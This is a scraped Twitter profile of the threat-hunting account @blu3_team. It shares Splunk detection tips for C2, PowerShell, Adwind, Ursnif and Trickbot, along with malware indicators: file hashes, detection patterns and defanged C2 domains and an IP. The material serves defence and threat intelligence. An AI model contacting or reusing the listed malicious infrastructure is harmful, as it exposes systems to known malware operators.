Tweetovi
- Tweetovi, trenutna stranica.
- Tweetovi i odgovori
- Medijski sadržaj
Blokirali ste korisnika/cu @blu3_team
Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @blu3_team
-
Prikvačeni tweet
Another method of C2 detection using Splunk with rare domain and PC counts. https://blu3-team.blogspot.com/2019/05/detecting-c2-using-splunk.html …pic.twitter.com/Jkelpcpg3E
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Powershell -encodedcommand decoding with Splunk Decrypt App AKA: How to get rid of the pesky periods in the base64_decode https://blu3-team.blogspot.com/2019/11/advanced-powershell-hunting-with-splunk.html …
#ThreathuntingHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Nice, turns out Scr files generally have a manageable list of parents. https://blu3-team.blogspot.com/2019/10/scr-from-unusual-parent.html …
#threathuntinghttps://twitter.com/Timele9527/status/1186816375857139712 …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Detecting
#Adwind using clustered child processes of java.exe Kudos to@anyrun_app for making#threathunting easier! https://blu3-team.blogspot.com/2019/10/detecting-adwind-using-clustered-child.html …https://app.any.run/tasks/455f13a6-c615-4969-bbfb-50967760b158/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Using Splunk to detect wmiprvse.exe as parent in close proximity to Winword.exe startup
#ursnif#threathunting https://blu3-team.blogspot.com/2019/10/detect-wmiprvseexe-as-parent-in-close.html …https://app.any.run/tasks/e2cc76c0-0551-496f-8830-65b4a5de6077/ …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Using pfSense to selectively allow traffic during dynamic malware analysis. Had fun setting this up so I thought I would share the process. https://blu3-team.blogspot.com/2019/09/using-pfsense-to-selectively-allow.html …
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
#Trickbot installation Command line looking for "findstr" and "lnk" might be a good early indicator. https://app.any.run/tasks/42653bc4-98f6-4f21-9537-37cdd82fb8b5/ …pic.twitter.com/MrLuljAmSj
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Some methods for profiling scheduled tasks.
#threathunting https://blu3-team.blogspot.com/2019/07/profiling-scheduled-tasks.html …Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
@blu3_team proslijedio/la je Tweet
PB&J. Wine and cheese. Some pairs just go together but others don't. Which is why today on the blog we're talking all about how to find anomalous pairs during threat hunting. Take 6 min to read our tips on how to find these in your environment: http://bit.ly/2LdnTnU pic.twitter.com/LASElcT8NL
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
A couple of sigs for some file extension shenanigans. Nothing new, but you might want to check to see if you have them. https://blu3-team.blogspot.com/2019/06/misleading-extensions-xlsexe-docexe.html …
#threathunting@cyb3ropspic.twitter.com/CRWIibgn4g
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Seeing some adware trying to overwrite the zone.identifier. Command lines containing cmd echo zone.identifier should find it.
#threathuntingpic.twitter.com/40vIeYv9pU
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
8.t
#Malware 78965.doc 10348b56b0e3466f9f9fa62bda081c98 QCRat C2: login\.vietnamairlines1\.compic.twitter.com/nLrsQQFmd4
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
Google's search leaves users in the dark: DuckDuckGo CEO https://finance.yahoo.com/news/googles-search-leaves-users-dark-duckduck-go-ceo-214438103.html?soc_src=community&soc_trk=tw … via
@YahooFinanceHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
#Malware Danh sách BQP dự họp TTg.doc List of participants of the meeting a48431970d150d977562c892c6c124cb OSE.EXE 86a0557fc47d79ad1cc056f229dab944 unio.exe legit LBTServ.dll 5767a17038ca8003ee3e806c5c64b2da k1.ini C2: goog1eupdate\.compic.twitter.com/94UiOGxA1r
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
#Malware 61c22d7612299e5838fc62f2b7f50a33efdbb1bc.rtf 0ee22eb0612a4e44c0425d1d9d978056 Drops ose.exe 596fb3f3d6f5a8d1a1fa8f6bd428e56b Antivm Tries to resolve www\.oprojectllheokdetectedmaliciouscode\.com resolution must fail to get the C2: mx.rec.dnsabr\.compic.twitter.com/lc5ZbTCfll
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
@_jsoo_ noted that this is an older sample, my bad. The components are still in place so it still works.Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
#Malware Persecution Cases.docx.lnk a63b22171593d78109c38f0a405f6e60 Delivery from www\.geocities\.jp C2: web\.adobephotostage\.compic.twitter.com/P9EAPpFoQc
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi -
@blu3_team proslijedio/la je TweetHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
Hvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
-
#Malware 4116054684711436178.rtf 58ab2781a59767cc36198de474df7dc3 C2: 185.200.116\.181 drops mshtml.dll 96df4162f5c3439ea7cb7bd5e2097dae config.dat takshosts.exe c9279ab390d7431a27da3463de0e9b16 update.exe ff89261094e69e8282dbfc974466fb07pic.twitter.com/dkuTYouAmP
Prikaži ovu nitHvala. Twitter će to iskoristiti za poboljšanje vaše vremenske crte. PoništiPoništi
Čini se da učitavanje traje već neko vrijeme.
Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.